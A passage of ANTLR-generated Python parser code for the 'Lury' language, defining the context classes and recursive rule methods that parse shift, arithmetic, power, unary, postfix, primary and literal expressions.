def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLShift" ):
listener.exitLShift(self)
class AddExpContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAddExp" ):
listener.enterAddExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAddExp" ):
listener.exitAddExp(self)
class RShiftContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRShift" ):
listener.enterRShift(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRShift" ):
listener.exitRShift(self)
def shift_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Shift_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 30
self.enterRecursionRule(localctx, 30, self.RULE_shift_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.AddExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 197
self.addition_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 207
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 205
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
localctx = LuryParser.LShiftContext(self, LuryParser.Shift_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_shift_expression)
self.state = 199
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 200
self.match(LuryParser.T__30)
self.state = 201
self.addition_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.RShiftContext(self, LuryParser.Shift_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_shift_expression)
self.state = 202
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 203
self.match(LuryParser.T__31)
self.state = 204
self.addition_expression(0)
pass
self.state = 209
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Addition_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_addition_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AddContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAdd" ):
listener.enterAdd(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAdd" ):
listener.exitAdd(self)
class MulExpContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMulExp" ):
listener.enterMulExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMulExp" ):
listener.exitMulExp(self)
class SubContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSub" ):
listener.enterSub(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSub" ):
listener.exitSub(self)
class ConContext(Addition_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Addition_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCon" ):
listener.enterCon(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCon" ):
listener.exitCon(self)
def addition_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Addition_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 32
self.enterRecursionRule(localctx, 32, self.RULE_addition_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.MulExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 211
self.multiplication_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 224
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,19,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 222
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
localctx = LuryParser.AddContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 213
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 214
self.match(LuryParser.T__32)
self.state = 215
self.multiplication_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.SubContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 216
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 217
self.match(LuryParser.T__33)
self.state = 218
self.multiplication_expression(0)
pass
elif la_ == 3:
localctx = LuryParser.ConContext(self, LuryParser.Addition_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_addition_expression)
self.state = 219
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 220
self.match(LuryParser.T__34)
self.state = 221
self.multiplication_expression(0)
pass
self.state = 226
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,19,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Multiplication_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_multiplication_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class DivContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDiv" ):
listener.enterDiv(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDiv" ):
listener.exitDiv(self)
class ModContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMod" ):
listener.enterMod(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMod" ):
listener.exitMod(self)
class MulContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterMul" ):
listener.enterMul(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitMul" ):
listener.exitMul(self)
class IDivContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def multiplication_expression(self):
return self.getTypedRuleContext(LuryParser.Multiplication_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIDiv" ):
listener.enterIDiv(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIDiv" ):
listener.exitIDiv(self)
class PowerExpContext(Multiplication_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Multiplication_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPowerExp" ):
listener.enterPowerExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPowerExp" ):
listener.exitPowerExp(self)
def multiplication_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Multiplication_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 34
self.enterRecursionRule(localctx, 34, self.RULE_multiplication_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.PowerExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 228
self.power_expression()
self._ctx.stop = self._input.LT(-1)
self.state = 244
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,21,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 242
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
if la_ == 1:
localctx = LuryParser.MulContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 230
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 231
self.match(LuryParser.T__35)
self.state = 232
self.power_expression()
pass
elif la_ == 2:
localctx = LuryParser.DivContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 233
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 234
self.match(LuryParser.T__36)
self.state = 235
self.power_expression()
pass
elif la_ == 3:
localctx = LuryParser.IDivContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 236
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 237
self.match(LuryParser.T__37)
self.state = 238
self.power_expression()
pass
elif la_ == 4:
localctx = LuryParser.ModContext(self, LuryParser.Multiplication_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_multiplication_expression)
self.state = 239
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 240
self.match(LuryParser.T__38)
self.state = 241
self.power_expression()
pass
self.state = 246
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,21,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Power_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_power_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class PowerContext(Power_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Power_expressionContext
super().__init__(parser)
self.left = None # Unary_expressionContext
self.op = None # Token
self.copyFrom(ctx)
def unary_expression(self):
return self.getTypedRuleContext(LuryParser.Unary_expressionContext,0)
def power_expression(self):
return self.getTypedRuleContext(LuryParser.Power_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPower" ):
listener.enterPower(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPower" ):
listener.exitPower(self)
def power_expression(self):
localctx = LuryParser.Power_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_power_expression)
try:
localctx = LuryParser.PowerContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 247
localctx.left = self.unary_expression()
self.state = 250
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,22,self._ctx)
if la_ == 1:
self.state = 248
localctx.op = self.match(LuryParser.T__39)
self.state = 249
self.power_expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Unary_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_unary_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class UnaryContext(Unary_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Unary_expressionContext
super().__init__(parser)
self.unary = None # Unary_expressionContext
self.copyFrom(ctx)
def unary_expression(self):
return self.getTypedRuleContext(LuryParser.Unary_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterUnary" ):
listener.enterUnary(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitUnary" ):
listener.exitUnary(self)
class PostfixExpContext(Unary_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Unary_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostfixExp" ):
listener.enterPostfixExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostfixExp" ):
listener.exitPostfixExp(self)
def unary_expression(self):
localctx = LuryParser.Unary_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_unary_expression)
self._la = 0 # Token type
try:
self.state = 255
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41]:
localctx = LuryParser.UnaryContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 252
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__32) | (1 << LuryParser.T__33) | (1 << LuryParser.T__34) | (1 << LuryParser.T__40) | (1 << LuryParser.T__41))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 253
localctx.unary = self.unary_expression()
pass
elif token in [LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.PostfixExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 254
self.postfix_expression(0)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Postfix_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_postfix_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IndexerContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.Key = None # Key_indexContext
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def key_index(self):
return self.getTypedRuleContext(LuryParser.Key_indexContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIndexer" ):
listener.enterIndexer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIndexer" ):
listener.exitIndexer(self)
class PostDecrementContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostDecrement" ):
listener.enterPostDecrement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostDecrement" ):
listener.exitPostDecrement(self)
class PostIncrementContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def postfix_expression(self):
return self.getTypedRuleContext(LuryParser.Postfix_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPostIncrement" ):
listener.enterPostIncrement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPostIncrement" ):
listener.exitPostIncrement(self)
class PrimaryExpContext(Postfix_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Postfix_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrimaryExp" ):
listener.enterPrimaryExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrimaryExp" ):
listener.exitPrimaryExp(self)
def postfix_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Postfix_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 40
self.enterRecursionRule(localctx, 40, self.RULE_postfix_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.PrimaryExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 258
self.primary()
self._ctx.stop = self._input.LT(-1)
self.state = 271
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,25,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 269
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,24,self._ctx)
if la_ == 1:
localctx = LuryParser.PostIncrementContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 260
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 261
self.match(LuryParser.T__40)
pass
elif la_ == 2:
localctx = LuryParser.PostDecrementContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 262
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 263
self.match(LuryParser.T__41)
pass
elif la_ == 3:
localctx = LuryParser.IndexerContext(self, LuryParser.Postfix_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_postfix_expression)
self.state = 264
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 265
self.match(LuryParser.T__42)
self.state = 266
localctx.Key = self.key_index()
self.state = 267
self.match(LuryParser.T__43)
pass
self.state = 273
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,25,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Key_indexContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def primary(self):
return self.getTypedRuleContext(LuryParser.PrimaryContext,0)
def getRuleIndex(self):
return LuryParser.RULE_key_index
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterKey_index" ):
listener.enterKey_index(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitKey_index" ):
listener.exitKey_index(self)
def key_index(self):
localctx = LuryParser.Key_indexContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_key_index)
try:
self.enterOuterAlt(localctx, 1)
self.state = 274
self.primary()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PrimaryContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_primary
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NilContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNil" ):
listener.enterNil(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNil" ):
listener.exitNil(self)
class IdentifierContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def NAME(self):
return self.getToken(LuryParser.NAME, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIdentifier" ):
listener.enterIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIdentifier" ):
listener.exitIdentifier(self)
class PrimaryLiteralContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def literal(self):
return self.getTypedRuleContext(LuryParser.LiteralContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrimaryLiteral" ):
listener.enterPrimaryLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrimaryLiteral" ):
listener.exitPrimaryLiteral(self)
class TrueContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTrue" ):
listener.enterTrue(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTrue" ):
listener.exitTrue(self)
class FalseContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.copyFrom(ctx)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFalse" ):
listener.enterFalse(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFalse" ):
listener.exitFalse(self)
class ParenthesesContext(PrimaryContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.PrimaryContext
super().__init__(parser)
self.exp = None # ExpressionContext
self.copyFrom(ctx)
def expression(self):
return self.getTypedRuleContext(LuryParser.ExpressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParentheses" ):
listener.enterParentheses(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParentheses" ):
listener.exitParentheses(self)
def primary(self):
localctx = LuryParser.PrimaryContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_primary)
try:
self.state = 285
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.NAME]:
localctx = LuryParser.IdentifierContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 276
self.match(LuryParser.NAME)
pass
elif token in [LuryParser.T__42, LuryParser.T__49, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.PrimaryLiteralContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 277
self.literal()
pass
elif token in [LuryParser.T__44]:
localctx = LuryParser.TrueContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 278
self.match(LuryParser.T__44)
pass
elif token in [LuryParser.T__45]:
localctx = LuryParser.FalseContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 279
self.match(LuryParser.T__45)
pass
elif token in [LuryParser.T__46]:
localctx = LuryParser.NilContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 280
self.match(LuryParser.T__46)
pass
elif token in [LuryParser.T__47]:
localctx = LuryParser.ParenthesesContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 281
self.match(LuryParser.T__47)
self.state = 282
localctx.exp = self.expression()
self.state = 283
self.match(LuryParser.T__48)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_literal
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IntegerContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def DECIMAL_INTEGER(self):
return self.getToken(LuryParser.DECIMAL_INTEGER, 0)
def OCT_INTEGER(self):
return self.getToken(LuryParser.OCT_INTEGER, 0)
def HEX_INTEGER(self):
return self.getToken(LuryParser.HEX_INTEGER, 0)
def BIN_INTEGER(self):
return self.getToken(LuryParser.BIN_INTEGER, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInteger" ):
listener.enterInteger(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInteger" ):
listener.exitInteger(self)
class RealContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def FLOAT_NUMBER(self):
return self.getToken(LuryParser.FLOAT_NUMBER, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterReal" ):
listener.enterReal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitReal" ):
listener.exitReal(self)
class ListContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def list_literal(self):
return self.getTypedRuleContext(LuryParser.List_literalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterList" ):
listener.enterList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitList" ):
listener.exitList(self)
class StringContext(LiteralContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.LiteralContext
super().__init__(parser)
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(LuryParser.STRING_LITERAL, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterString" ):
